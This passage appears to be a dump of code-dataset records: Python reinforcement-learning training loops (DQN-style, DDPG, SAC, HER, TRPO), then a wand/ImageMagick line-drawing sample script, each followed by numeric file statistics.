                cnt_action = list()
                policy.index_episode = i
                agent.index_episode = i
                episode_memory = list()  # transitions of the current episode, flushed on done
                for t in itertools.count():
                    # env.render()
                    action = policy.select_action(agent, state.reshape(1, 4))
                    next_state, reward, done, info = env.step(action)
                    episode_memory.append((state, action, reward, next_state, done))
                    total_reward += reward
                    state = next_state
                    cnt_action.append(action)
                    global_timestep += 1
                    if global_timestep > params.learning_start:
                        states, actions, rewards, next_states, dones = replay_buffer.sample(params.batch_size)
                        _states, _actions, _rewards, _next_states, _dones = [], [], [], [], []
                        # slice a random contiguous window of 4 timesteps out of each sampled episode
                        for index, data in enumerate(zip(states, actions, rewards, next_states, dones)):
                            s1, a, r, s2, d = data
                            ep_start = np.random.randint(0, len(s1) + 1 - 4)
                            # states[i] = s1[ep_start:ep_start+4, :]
                            # actions[i] = a[ep_start:ep_start+4]
                            # rewards[i] = r[ep_start:ep_start+4]
                            # next_states[i] = s2[ep_start:ep_start+4, :]
                            # dones[i] = d[ep_start:ep_start+4]
                            _states.append(s1[ep_start:ep_start + 4, :])
                            _actions.append(a[ep_start:ep_start + 4])
                            _rewards.append(r[ep_start:ep_start + 4])
                            _next_states.append(s2[ep_start:ep_start + 4, :])
                            _dones.append(d[ep_start:ep_start + 4])
                        _states, _actions, _rewards, _next_states, _dones = np.array(_states), np.array(
                            _actions), np.array(_rewards), np.array(_next_states), np.array(_dones)
                        # loss, batch_loss = agent.update(states, actions, rewards, next_states, dones)
                        loss, batch_loss = agent.update(_states, _actions, _rewards, _next_states, _dones)
                        logging(global_timestep, params.num_frames, i, time.time() - start, total_reward, np.mean(loss),
                                policy.current_epsilon(), cnt_action)
                        # randomised model sync: roughly every other update
                        if np.random.rand() > 0.5:
                            agent.manager.save()
                            if params.update_hard_or_soft == "hard":
                                agent.target_model.set_weights(agent.main_model.get_weights())
                            elif params.update_hard_or_soft == "soft":
                                soft_target_model_update_eager(agent.target_model, agent.main_model,
                                                               tau=params.soft_update_tau)
                    if done:
                        tf.contrib.summary.scalar("reward", total_reward, step=global_timestep)
                        reward_buffer.append(total_reward)
                        # unzip the episode into parallel lists and store it as one buffer entry
                        s1, a, r, s2, d = [], [], [], [], []
                        for data in episode_memory:
                            s1.append(data[0])
                            a.append(data[1])
                            r.append(data[2])
                            s2.append(data[3])
                            d.append(data[4])
                        replay_buffer.add(s1, a, r, s2, d)
                        break
                # check the stopping condition
                if np.mean(reward_buffer) > params.goal:
                    print("GAME OVER!!")
                    env.close()
                    break
"""
===== Policy Gradient Algorithm =====
"""
def train_DDPG_original(agent, env, replay_buffer, reward_buffer, summary_writer):
    """
    Off-policy DDPG training loop: actor/critic are updated at every environment
    step once the warm-up phase (learning_start) is over.

    :param agent: DDPG agent exposing params, predict(), update(), random_process,
                  actor/critic (+ targets) and their checkpoint managers
    :param env: gym-style continuous-control environment
    :param replay_buffer: experience buffer exposing add() and sample()
    :param reward_buffer: running buffer of episode rewards (appended to here)
    :param summary_writer: TensorBoard summary writer used as the logging context
    :return: None
    """
    get_ready(agent.params)
    global_timestep = tf.compat.v1.train.get_or_create_global_step()
    time_buffer = deque(maxlen=agent.params.reward_buffer_ep)
    log = logger(agent.params)
    # evaluation traces collected for the final action/distance visualisation
    action_buffer, distance_buffer, eval_epochs = list(), list(), list()
    with summary_writer.as_default():
        # for summary purpose, we put all codes in this context
        with tf.contrib.summary.always_record_summaries():
            for i in itertools.count():  # one iteration == one episode
                state = env.reset()
                total_reward = 0
                start = time.time()
                agent.random_process.reset_states()
                done = False
                episode_len = 0
                while not done:
                    # random warm-up actions until learning starts, then the actor's prediction
                    if global_timestep.numpy() < agent.params.learning_start:
                        action = env.action_space.sample()
                    else:
                        action = agent.predict(state)
                    # scale for execution in env (in DDPG, every action is clipped between [-1, 1] in agent.predict)
                    next_state, reward, done, info = env.step(action * env.action_space.high)
                    replay_buffer.add(state, action, reward, next_state, done)
                    """
                    === Update the models
                    """
                    if global_timestep.numpy() > agent.params.learning_start:
                        states, actions, rewards, next_states, dones = replay_buffer.sample(agent.params.batch_size)
                        loss = agent.update(states, actions, rewards, next_states, dones)
                        soft_target_model_update_eager(agent.target_actor, agent.actor, tau=agent.params.soft_update_tau)
                        soft_target_model_update_eager(agent.target_critic, agent.critic, tau=agent.params.soft_update_tau)
                    global_timestep.assign_add(1)
                    episode_len += 1
                    total_reward += reward
                    state = next_state
                    # for evaluation purpose
                    if global_timestep.numpy() % agent.params.eval_interval == 0:
                        agent.eval_flg = True
                """
                ===== After 1 Episode is Done =====
                """
                # save the updated models
                agent.actor_manager.save()
                agent.critic_manager.save()
                # store the episode related variables
                reward_buffer.append(total_reward)
                time_buffer.append(time.time() - start)
                # logging on Tensorboard
                if global_timestep.numpy() > agent.params.learning_start:
                    tf.contrib.summary.scalar("reward", total_reward, step=global_timestep.numpy())
                    tf.contrib.summary.scalar("loss", loss, step=global_timestep.numpy())
                    tf.contrib.summary.scalar("exec time", time.time() - start, step=global_timestep.numpy())
                    if i >= agent.params.reward_buffer_ep:
                        tf.contrib.summary.scalar("Moving Ave Reward", np.mean(reward_buffer), step=global_timestep.numpy())
                # logging
                if global_timestep.numpy() > agent.params.learning_start and i % agent.params.reward_buffer_ep == 0:
                    log.logging(global_timestep.numpy(), i, np.sum(time_buffer), reward_buffer, np.mean(loss), 0, [0])
                # evaluation
                if agent.eval_flg:
                    eval_reward, eval_distance, eval_action = eval_Agent_DDPG(env, agent)
                    eval_epochs.append(global_timestep.numpy())
                    action_buffer.append(eval_action)
                    distance_buffer.append(eval_distance)
                    agent.eval_flg = False
                # check the stopping condition
                if global_timestep.numpy() > agent.params.num_frames:
                    print("=== Training is Done ===")
                    eval_reward, eval_distance, eval_action = eval_Agent_DDPG(env, agent)
                    eval_epochs.append(global_timestep.numpy())
                    action_buffer.append(eval_action)
                    distance_buffer.append(eval_distance)
                    visualise_act_and_dist(np.array(eval_epochs), np.array(action_buffer), np.array(distance_buffer),
                                           env_name=agent.params.env_name, file_dir=agent.params.plot_path)
                    env.close()
                    break
def train_DDPG_onpolicy(agent, env, replay_buffer, reward_buffer, summary_writer):
    """ the cycle of updating the model is the off-policy, we use the updated policy after the previous episode

    Variant of train_DDPG_original: the replay buffer is refreshed at the start of
    every episode and all model updates happen in a batch after the episode ends
    (episode_len update steps), instead of one update per environment step.

    :param agent: DDPG agent exposing params, predict(), update(), random_process,
                  actor/critic (+ targets) and their checkpoint managers
    :param env: gym-style continuous-control environment
    :param replay_buffer: experience buffer exposing refresh(), add() and sample()
    :param reward_buffer: running buffer of episode rewards (appended to here)
    :param summary_writer: TensorBoard summary writer used as the logging context
    :return: None
    """
    get_ready(agent.params)
    global_timestep = tf.compat.v1.train.get_or_create_global_step()
    time_buffer = deque(maxlen=agent.params.reward_buffer_ep)
    log = logger(agent.params)
    # evaluation traces collected for the final action/distance visualisation
    action_buffer, distance_buffer, eval_epochs = list(), list(), list()
    with summary_writer.as_default():
        # for summary purpose, we put all codes in this context
        with tf.contrib.summary.always_record_summaries():
            for i in itertools.count():  # one iteration == one episode
                state = env.reset()
                total_reward = 0
                start = time.time()
                agent.random_process.reset_states()
                done = False
                episode_len = 0
                # we refresh the replay_buffer at every episode
                replay_buffer.refresh()
                while not done:
                    # random warm-up actions until learning starts, then the actor's prediction
                    if global_timestep.numpy() < agent.params.learning_start:
                        action = env.action_space.sample()
                    else:
                        action = agent.predict(state)
                    # scale for execution in env (in DDPG, every action is clipped between [-1, 1] in agent.predict)
                    next_state, reward, done, info = env.step(action * env.action_space.high)
                    replay_buffer.add(state, action, reward, next_state, done)
                    global_timestep.assign_add(1)
                    episode_len += 1
                    total_reward += reward
                    state = next_state
                    # for evaluation purpose
                    if global_timestep.numpy() % agent.params.eval_interval == 0:
                        agent.eval_flg = True
                """
                ===== After 1 Episode is Done =====
                """
                # We have to be careful about the amount of minibatch size
                batch_size = np.minimum(len(replay_buffer)-1, agent.params.batch_size)
                # train the model at this point
                for t_train in range(int(episode_len)):
                    # for t_train in range(10): # for test purpose
                    states, actions, rewards, next_states, dones = replay_buffer.sample(batch_size)
                    loss = agent.update(states, actions, rewards, next_states, dones)
                    soft_target_model_update_eager(agent.target_actor, agent.actor, tau=agent.params.soft_update_tau)
                    soft_target_model_update_eager(agent.target_critic, agent.critic, tau=agent.params.soft_update_tau)
                # save the updated models
                agent.actor_manager.save()
                agent.critic_manager.save()
                # store the episode related variables
                reward_buffer.append(total_reward)
                time_buffer.append(time.time() - start)
                # logging on Tensorboard
                if global_timestep.numpy() > agent.params.learning_start:
                    tf.contrib.summary.scalar("reward", total_reward, step=global_timestep.numpy())
                    tf.contrib.summary.scalar("loss", loss, step=global_timestep.numpy())
                    tf.contrib.summary.scalar("exec time", time.time() - start, step=global_timestep.numpy())
                    if i >= agent.params.reward_buffer_ep:
                        tf.contrib.summary.scalar("Moving Ave Reward", np.mean(reward_buffer), step=global_timestep.numpy())
                # logging
                if global_timestep.numpy() > agent.params.learning_start and i % agent.params.reward_buffer_ep == 0:
                    log.logging(global_timestep.numpy(), i, np.sum(time_buffer), reward_buffer, np.mean(loss), 0, [0])
                # evaluation
                if agent.eval_flg:
                    eval_reward, eval_distance, eval_action = eval_Agent_DDPG(env, agent)
                    eval_epochs.append(global_timestep.numpy())
                    action_buffer.append(eval_action)
                    distance_buffer.append(eval_distance)
                    agent.eval_flg = False
                # check the stopping condition
                if global_timestep.numpy() > agent.params.num_frames:
                    print("=== Training is Done ===")
                    eval_reward, eval_distance, eval_action = eval_Agent_DDPG(env, agent)
                    eval_epochs.append(global_timestep.numpy())
                    action_buffer.append(eval_action)
                    distance_buffer.append(eval_distance)
                    visualise_act_and_dist(np.array(eval_epochs), np.array(action_buffer), np.array(distance_buffer),
                                           env_name=agent.params.env_name, file_dir=agent.params.plot_path)
                    env.close()
                    break
def train_SAC(agent, env, replay_buffer, reward_buffer, summary_writer):
    """
    Soft Actor-Critic training loop: one update per environment step after the
    warm-up phase; only the target critic is soft-updated.

    :param agent: SAC agent exposing params, predict(), update(), critic (+ target)
                  and actor/critic checkpoint managers
    :param env: gym-style continuous-control environment
    :param replay_buffer: experience buffer exposing add() and sample()
    :param reward_buffer: running buffer of episode rewards (appended to here)
    :param summary_writer: TensorBoard summary writer used as the logging context
    :return: None
    """
    get_ready(agent.params)
    global_timestep = tf.compat.v1.train.get_or_create_global_step()
    time_buffer = deque(maxlen=agent.params.reward_buffer_ep)
    log = logger(agent.params)
    # evaluation traces collected for the final action/distance visualisation
    action_buffer, distance_buffer, eval_epochs = list(), list(), list()
    with summary_writer.as_default():
        # for summary purpose, we put all codes in this context
        with tf.contrib.summary.always_record_summaries():
            for i in itertools.count():  # one iteration == one episode
                state = env.reset()
                total_reward = 0
                start = time.time()
                done = False
                episode_len = 0
                while not done:
                    # random warm-up actions until learning starts, then the actor's prediction
                    if global_timestep.numpy() < agent.params.learning_start:
                        action = env.action_space.sample()
                    else:
                        action = agent.predict(state)
                    next_state, reward, done, info = env.step(action)
                    replay_buffer.add(state, action, reward, next_state, done)
                    global_timestep.assign_add(1)
                    episode_len += 1
                    total_reward += reward
                    state = next_state
                    # for evaluation purpose
                    if global_timestep.numpy() % agent.params.eval_interval == 0:
                        agent.eval_flg = True
                    """
                    === Update the models
                    """
                    if global_timestep.numpy() > agent.params.learning_start:
                        states, actions, rewards, next_states, dones = replay_buffer.sample(agent.params.batch_size)
                        loss = agent.update(states, actions, rewards, next_states, dones)
                        soft_target_model_update_eager(agent.target_critic, agent.critic, tau=agent.params.soft_update_tau)
                """
                ===== After 1 Episode is Done =====
                """
                # save the updated models
                agent.actor_manager.save()
                agent.critic_manager.save()
                # store the episode related variables
                reward_buffer.append(total_reward)
                time_buffer.append(time.time() - start)
                # logging on Tensorboard
                tf.contrib.summary.scalar("reward", total_reward, step=global_timestep.numpy())
                tf.contrib.summary.scalar("exec time", time.time() - start, step=global_timestep.numpy())
                if i >= agent.params.reward_buffer_ep:
                    tf.contrib.summary.scalar("Moving Ave Reward", np.mean(reward_buffer), step=global_timestep.numpy())
                # we log the training progress once in a `reward_buffer_ep` time
                if global_timestep.numpy() > agent.params.learning_start and i % agent.params.reward_buffer_ep == 0:
                    log.logging(global_timestep.numpy(), i, time.time() - start, reward_buffer, np.mean(loss), 0, [0])
                # evaluation
                if agent.eval_flg:
                    eval_reward, eval_distance, eval_action = eval_Agent_DDPG(env, agent)
                    eval_epochs.append(global_timestep.numpy())
                    action_buffer.append(eval_action)
                    distance_buffer.append(eval_distance)
                    agent.eval_flg = False
                # check the stopping condition
                if global_timestep.numpy() > agent.params.num_frames:
                    print("=== Training is Done ===")
                    eval_reward, eval_distance, eval_action = eval_Agent_DDPG(env, agent)
                    eval_epochs.append(global_timestep.numpy())
                    action_buffer.append(eval_action)
                    distance_buffer.append(eval_distance)
                    visualise_act_and_dist(np.array(eval_epochs), np.array(action_buffer), np.array(distance_buffer),
                                           env_name=agent.params.env_name, file_dir=agent.params.plot_path)
                    env.close()
                    break
# design pattern follows this repo: https://github.com/TianhongDai/hindsight-experience-replay
def train_HER(agent, env, replay_buffer, summary_writer):
    """Train a goal-conditioned agent with Hindsight Experience Replay (HER).

    Loop structure (epoch -> cycle -> episode) follows
    https://github.com/TianhongDai/hindsight-experience-replay

    :param agent: agent exposing predict/update, o_norm/g_norm normalisers,
                  actor/critic (+ target) networks and hyper-params in `params`
    :param env: goal-based gym-like environment; `state_unpacker` splits its
                observations into (obs, achieved_goal, desired_goal, raw_goal)
    :param replay_buffer: HER buffer with store_episode / sample / sample_func
    :param summary_writer: tf.contrib.summary writer used for scalar logging
    """
    get_ready(agent.params)
    global_timestep = tf.compat.v1.train.get_global_step()
    total_ep = 0
    with summary_writer.as_default():
        # for summary purpose, we put all codes in this context
        with tf.contrib.summary.always_record_summaries():
            for epoch in range(agent.params.num_epochs):
                successes = list()
                for cycle in range(agent.params.num_cycles):
                    # minibatch accumulators over the episodes of this cycle
                    mb_obs, mb_ag, mb_g, mb_actions = [], [], [], []
                    for ep in range(agent.params.num_episodes):
                        state = env.reset()
                        # obs, achieved_goal, desired_goal in `numpy.ndarray`
                        obs, ag, dg, rg = state_unpacker(state)
                        ep_obs, ep_ag, ep_g, ep_actions = [], [], [], []
                        success = list()
                        for ts in range(agent.params.num_steps):
                            # env.render()
                            action = agent.predict(obs, dg)
                            action = action_postprocessing(action, agent.params)
                            next_state, _, _, info = env.step(action)
                            # obs, achieved_goal, desired_goal in `numpy.ndarray`
                            next_obs, next_ag, next_dg, next_rg = state_unpacker(next_state)
                            ep_obs.append(obs.copy())
                            ep_ag.append(ag.copy())
                            ep_g.append(dg.copy())
                            ep_actions.append(action.copy())
                            global_timestep.assign_add(1)
                            success.append(info.get('is_success'))
                            obs = next_obs
                            # rg = next_rg
                            ag = next_ag
                        """
                        === After 1 ep ===
                        """
                        # append the terminal obs/achieved-goal so obs arrays are
                        # one element longer than the action array (for `obs_next`)
                        ep_obs.append(obs.copy())
                        ep_ag.append(ag.copy())
                        mb_obs.append(ep_obs)
                        mb_ag.append(ep_ag)
                        mb_g.append(ep_g)
                        mb_actions.append(ep_actions)
                        successes.append(success)
                    # NOTE(review): `ep` is the last loop index (num_episodes - 1),
                    # not the episode count, and `success` below is only the LAST
                    # episode's flags — confirm both are intended for this summary
                    total_ep += ep
                    tf.contrib.summary.scalar("Train Success Rate", np.mean(success), step=total_ep)
                    """
                    === After num_episodes ===
                    """
                    # convert them into arrays
                    mb_obs = np.array(mb_obs)
                    mb_ag = np.array(mb_ag)
                    mb_g = np.array(mb_g)
                    mb_actions = np.array(mb_actions)
                    replay_buffer.store_episode([mb_obs, mb_ag, mb_g, mb_actions])
                    # ==== update normaliser ====
                    # shifted views: element t+1 of obs/ag is the "next" of element t
                    mb_obs_next = mb_obs[:, 1:, :]
                    mb_ag_next = mb_ag[:, 1:, :]
                    # get the number of normalization transitions
                    num_transitions = mb_actions.shape[1]
                    # create the new buffer to store them
                    buffer_temp = {'obs': mb_obs,
                                   'ag': mb_ag,
                                   'g': mb_g,
                                   'actions': mb_actions,
                                   'obs_next': mb_obs_next,
                                   'ag_next': mb_ag_next,
                                   }
                    transitions = replay_buffer.sample_func(buffer_temp, num_transitions)
                    # update the running moments with HER-relabelled samples
                    agent.o_norm.update(transitions['obs'])
                    agent.g_norm.update(transitions['g'])
                    # ==== finish update normaliser ====
                    # Update Loop
                    for _ in range(agent.params.num_updates):
                        transitions = replay_buffer.sample(agent.params.batch_size)
                        agent.update(transitions)
                    # sync networks (Polyak averaging towards the online nets)
                    soft_target_model_update_eager(agent.target_actor, agent.actor, tau=agent.params.tau)
                    soft_target_model_update_eager(agent.target_critic, agent.critic, tau=agent.params.tau)
                """
                === After 1 epoch ===
                """
                # each epoch, we test the agent
                success_rate = eval_Agent_HER(agent, env, n_trial=agent.params.test_episodes)
                tf.contrib.summary.scalar("Test Success Rate", success_rate, step=epoch)
                print("Epoch: {:03d}/{} | Train Success Rate: {:.3f} | Test Success Rate: {:.3f}".format(
                    epoch, agent.params.num_epochs, np.mean(np.array(successes)), success_rate
                ))
    print("=== Training is Done ===")
    eval_Agent_HER(agent, env, n_trial=agent.params.test_episodes)
    env.close()
# in this algo, since the order of occurrence is important so that
# we don't use Experience Replay to randomly sample trajectory
def train_TRPO(agent, env, reward_buffer, summary_writer):
    """Train a TRPO agent from freshly rolled-out on-policy trajectories.

    Since TRPO is on-policy and the order of occurrence within a trajectory
    matters, episodes are collected and consumed directly instead of being
    sampled from an experience-replay buffer.

    :param agent: TRPO agent exposing predict/update and hyper-params in `params`
    :param env: gym-like environment
    :param reward_buffer: deque collecting per-episode rewards (moving average)
    :param summary_writer: tf.contrib.summary writer used for scalar logging
    """
    get_ready(agent.params)
    global_timestep = tf.compat.v1.train.get_global_step()
    time_buffer = deque(maxlen=agent.params.reward_buffer_ep)
    log = logger(agent.params)
    init_state = env.reset()
    normaliser = RunningMeanStd(init_state.shape[0])
    total_ep = 0
    # init_normaliser(env, normaliser) # init normaliser's moments by going through some episodes before training
    with summary_writer.as_default():
        # for summary purpose, we put all codes in this context
        with tf.contrib.summary.always_record_summaries():
            while global_timestep < agent.params.num_frames:
                states, actions, rewards = [], [], []
                for _ in range(agent.params.num_rollout):
                    # BUGFIX: the normalised reset state was previously discarded
                    # (`normaliser.normalise(state)` without assignment), so the
                    # first prediction of every episode saw an unnormalised state.
                    state = normaliser.normalise(env.reset())
                    total_reward = 0
                    start = time.time()
                    done = False
                    while not done:
                        # env.render()
                        action = agent.predict(state)
                        next_state, reward, done, info = env.step(action)
                        next_state = normaliser.normalise(next_state)
                        states.append(state)
                        actions.append(action)
                        # rewards.append(reward*0.0025) # reward scaling
                        rewards.append(reward) # reward scaling
                        global_timestep.assign_add(1)
                        total_reward += reward
                        state = next_state
                    """
                    ===== After 1 Episode =====
                    """
                    total_ep += 1
                    reward_buffer.append(total_reward)
                    time_buffer.append(time.time() - start)
                    # refresh the running moments with the states just visited
                    normaliser.update(np.array(states))
                    tf.contrib.summary.scalar("reward", total_reward, step=total_ep)
                    tf.contrib.summary.scalar("exec time", time.time() - start, step=total_ep)
                    tf.contrib.summary.scalar("Moving Ave Reward", np.mean(reward_buffer), step=total_ep)
                """
                ===== After Rolling out of episodes is Done =====
                """
                # update the weights: inside it's got a for-loop and a stopping condition
                # so that if the value of KL-divergence exceeds some threshold, then we stop updating.
                loss = agent.update(states, actions, rewards)
                log.logging(global_timestep.numpy(), total_ep, np.sum(time_buffer), reward_buffer, np.mean(loss), 0,
                            [0])
                eval_Agent_TRPO(agent, env)
                # check the stopping condition
                if global_timestep.numpy() > agent.params.num_frames:
                    print("=== Training is Done ===")
                    eval_Agent_TRPO(agent, env, n_trial=agent.params.test_episodes)
                    env.close()
                    break
"""
Distributed Version of Training APIs
"""
# import ray
#
#
# def train_HER_ray(agent, env, replay_buffer, summary_writer):
# ray.init()
# get_ready(agent.params)
# global_timestep = tf.compat.v1.train.get_global_step()
# total_ep = 0
#
# with summary_writer.as_default():
# # for summary purpose, we put all codes in this context
# with tf.contrib.summary.always_record_summaries():
#
# for epoch in range(agent.params.num_epochs):
# successes = list()
# for cycle in range(agent.params.num_cycles):
# mb_obs, mb_ag, mb_g, mb_actions = [], [], [], []
# # for ep in range(agent.params.num_episodes):
# agent_id = ray.put(agent)
# env_id = ray.put(env)
# tasks = [_inner_train_HER.remote(agent_id, env_id) for _ in range(agent.params.num_episodes)]
#
# res = ray.get(tasks)
# print(res)
# # asdf
#
# """
# === After num_episodes ===
# """
# # convert them into arrays
# mb_obs = np.array(mb_obs)
# mb_ag = np.array(mb_ag)
# mb_g = np.array(mb_g)
# mb_actions = np.array(mb_actions)
# replay_buffer.store_episode([mb_obs, mb_ag, mb_g, mb_actions])
#
# # ==== update normaliser ====
# mb_obs_next = mb_obs[:, 1:, :]
# mb_ag_next = mb_ag[:, 1:, :]
# # get the number of normalization transitions
# num_transitions = mb_actions.shape[1]
# # create the new buffer to store them
# buffer_temp = {'obs': mb_obs,
# 'ag': mb_ag,
# 'g': mb_g,
# 'actions': mb_actions,
# 'obs_next': mb_obs_next,
# 'ag_next': mb_ag_next,
# }
# transitions = replay_buffer.sample_func(buffer_temp, num_transitions)
# # update
# agent.o_norm.update(transitions['obs'])
# agent.g_norm.update(transitions['g'])
# # ==== finish update normaliser ====
#
# # Update Loop
# for _ in range(agent.params.num_updates):
# transitions = replay_buffer.sample(agent.params.batch_size)
# agent.update(transitions)
#
# # sync networks
# soft_target_model_update_eager(agent.target_actor, agent.actor, tau=agent.params.tau)
# soft_target_model_update_eager(agent.target_critic, agent.critic, tau=agent.params.tau)
#
# """
# === After 1 epoch ===
# """
# # each epoch, we test the agent
# success_rate = eval_Agent_HER(agent, env, n_trial=agent.params.test_episodes)
# tf.contrib.summary.scalar("Test Success Rate", success_rate, step=epoch)
#
# print("Epoch: {:03d}/{} | Train Success Rate: {:.3f} | Test Success Rate: {:.3f}".format(
# epoch, agent.params.num_epochs, np.mean(np.array(successes)), success_rate
# ))
#
# print("=== Training is Done ===")
# eval_Agent_HER(agent, env, n_trial=agent.params.test_episodes)
# env.close()
#
#
# @ray.remote
# def _inner_train_HER(agent, env):
# successes, mb_obs, mb_ag, mb_g, mb_actions = [], [], [], [], []
# state = env.reset()
# # obs, achieved_goal, desired_goal in `numpy.ndarray`
# obs, ag, dg, rg = state_unpacker(state)
# ep_obs, ep_ag, ep_g, ep_actions = [], [], [], []
# success = list()
# for ts in range(agent.params.num_steps):
# # env.render()
# action = agent.predict(obs, dg)
# action = action_postprocessing(action, agent.params)
#
# next_state, _, _, info = env.step(action)
#
# # obs, achieved_goal, desired_goal in `numpy.ndarray`
# next_obs, next_ag, next_dg, next_rg = state_unpacker(next_state)
#
# ep_obs.append(obs.copy())
# ep_ag.append(ag.copy())
# ep_g.append(dg.copy())
# ep_actions.append(action.copy())
#
# success.append(info.get('is_success'))
# obs = next_obs
# # rg = next_rg
# ag = next_ag
#
# """
# === After 1 ep ===
# """
# ep_obs.append(obs.copy())
# ep_ag.append(ag.copy())
# mb_obs.append(ep_obs)
# mb_ag.append(ep_ag)
# mb_g.append(ep_g)
# mb_actions.append(ep_actions)
# successes.append(success)
# return successes, mb_obs, mb_ag, mb_g, mb_actions
| 45.755769
| 153
| 0.534422
| 5,078
| 47,586
| 4.785939
| 0.072273
| 0.054314
| 0.060198
| 0.037526
| 0.893799
| 0.882813
| 0.864297
| 0.852487
| 0.836728
| 0.826688
| 0
| 0.005149
| 0.371496
| 47,586
| 1,039
| 154
| 45.799808
| 0.807443
| 0.202686
| 0
| 0.741071
| 0
| 0.001786
| 0.01829
| 0
| 0
| 0
| 0
| 0.000962
| 0
| 1
| 0.017857
| false
| 0.001786
| 0.007143
| 0
| 0.025
| 0.019643
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5461d67f5ab1a585d8629ba1bbc80224d5b5498a
| 6,476
|
py
|
Python
|
examples/drawing/sample16_line.py
|
chromia/wandplus
|
815127aeee85dbac3bc8fca35971d2153b1898a9
|
[
"ImageMagick",
"MIT"
] | null | null | null |
examples/drawing/sample16_line.py
|
chromia/wandplus
|
815127aeee85dbac3bc8fca35971d2153b1898a9
|
[
"ImageMagick",
"MIT"
] | null | null | null |
examples/drawing/sample16_line.py
|
chromia/wandplus
|
815127aeee85dbac3bc8fca35971d2153b1898a9
|
[
"ImageMagick",
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Line-drawing samples: how fill, stroke and stroke_width interact.

Each ``render_lines`` call below mirrors one ImageMagick ``convert`` command
from http://www.imagemagick.org/Usage/draw/#strokewidth
"""
from wand.image import Image
from wand.drawing import Drawing
from wand.color import Color


def render_lines(filename, ops, width=100, height=40, pointscale=None):
    """Draw one or more lines on a lightblue canvas and save the image.

    :param filename: output file name
    :param ops: list of ``(fill, stroke, stroke_width, (start, end))`` tuples,
                applied in order on the same drawing context; ``fill``,
                ``stroke`` and ``stroke_width`` may be None to leave the
                drawing's current setting untouched
    :param width: canvas width in pixels
    :param height: canvas height in pixels
    :param pointscale: optional ``(w, h)`` to point-resize (pixel zoom) the
                       result, mirroring ``-scale 400%`` in the originals
    """
    with Image(width=width, height=height, background=Color('lightblue')) as img:
        with Drawing() as draw:
            for fill, stroke, stroke_width, (start, end) in ops:
                if fill is not None:
                    draw.fill_color = Color(fill)
                if stroke is not None:
                    draw.stroke_color = Color(stroke)
                if stroke_width is not None:
                    draw.stroke_width = stroke_width
                draw.line(start, end)
            draw(img)
        if pointscale is not None:
            img.resize(pointscale[0], pointscale[1], 'point')
        img.save(filename=filename)


LINE = ((5, 35), (95, 5))       # diagonal used by the 100x40 samples
SMALL_LINE = ((2, 8), (22, 1))  # diagonal used by the 25x10 samples

# convert -size 100x40 xc:lightblue \
#         -draw "line 5,35 95,5"    \
#         line_default.jpg
render_lines('sample16a.png', [(None, None, None, LINE)])

# convert -size 100x40 xc:lightblue \
#         -fill white -draw "line 5,35 95,5"    \
#         line.jpg
render_lines('sample16b.png', [('white', None, None, LINE)])

# convert -size 100x40 xc:lightblue \
#         -fill white -stroke black -draw "line 5,35 95,5"    \
#         line_stroke.jpg
render_lines('sample16c.png', [('white', 'black', None, LINE)])

# convert -size 100x40 xc:lightblue \
#         -fill white -strokewidth 3 -draw "line 5,35 95,5"    \
#         line_fill_3.jpg
render_lines('sample16d.png', [('white', None, 3, LINE)])

# convert -size 100x40 xc:lightblue \
#         -stroke black -strokewidth 3 -draw "line 5,35 95,5"    \
#         line_stroke_3.jpg
render_lines('sample16e.png', [(None, 'black', 3, LINE)])

# convert -size 100x40 xc:lightblue \
#         -stroke black -strokewidth 1 -draw "line 5,35 95,5"    \
#         line_stroke_1.jpg
render_lines('sample16f.png', [(None, 'black', 1, LINE)])

# convert -size 100x40 xc:lightblue \
#         -stroke black -strokewidth 5 -draw "line 5,35 95,5"    \
#         -stroke white -strokewidth 2 -draw "line 5,35 95,5"    \
#         line_multi.jpg
render_lines('sample16g.png', [(None, 'black', 5, LINE),
                               (None, 'white', 2, LINE)])

# convert -size 100x40 xc:lightblue \
#         -fill white -stroke black -strokewidth 0 -draw "line 5,35 95,5" \
#         line_stroke_0.jpg
render_lines('sample16h.png', [('white', 'black', 0, LINE)])

# convert -size 25x10 xc:lightblue \
#         -fill white -stroke black -strokewidth 0 -draw "line 2,8 22,1" \
#         -scale 400%  line_stroke_0_white.jpg
render_lines('sample16i.png', [('white', 'black', 0, SMALL_LINE)],
             width=25, height=10, pointscale=(100, 40))

# convert -size 100x40 xc:lightblue \
#         -fill white -stroke black -strokewidth 0 -draw "line 5,20 95,20" \
#         line_stroke_horz.jpg
render_lines('sample16j.png', [('white', 'black', 0, ((5, 20), (95, 20)))])

# convert -size 25x10 xc:lightblue \
#         -fill none -stroke black -strokewidth 0 -draw "line 2,8 22,1" \
#         -scale 400%  line_stroke_0_none.jpg
render_lines('sample16k.png', [('none', 'black', 0, SMALL_LINE)],
             width=25, height=10, pointscale=(100, 40))

# convert -size 25x10 xc:lightblue \
#         -fill red -stroke black -strokewidth 0 -draw "line 2,8 22,1" \
#         -scale 400%  line_stroke_0_none.jpg
render_lines('sample16l.png', [('red', 'black', 0, SMALL_LINE)],
             width=25, height=10, pointscale=(100, 40))

# convert -size 25x10 xc:lightblue \
#         -fill black -stroke black -strokewidth 0 -draw "line 2,8 22,1" \
#         -scale 400%  line_stroke_0_none.jpg
render_lines('sample16m.png', [('black', 'black', 0, SMALL_LINE)],
             width=25, height=10, pointscale=(100, 40))

# convert -size 25x10 xc:lightblue \
#         -fill black -stroke none -draw "line 2,8 22,1" \
#         -scale 400%  line_stroke_-_black.jpg
render_lines('sample16n.png', [('black', 'none', 0, SMALL_LINE)],
             width=25, height=10, pointscale=(100, 40))
| 33.729167
| 76
| 0.609172
| 911
| 6,476
| 4.260154
| 0.084523
| 0.06184
| 0.04638
| 0.051018
| 0.903118
| 0.881732
| 0.881732
| 0.832517
| 0.794125
| 0.718887
| 0
| 0.082004
| 0.244904
| 6,476
| 191
| 77
| 33.905759
| 0.711656
| 0.31887
| 0
| 0.778761
| 0
| 0
| 0.100665
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.026549
| 0
| 0.026549
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
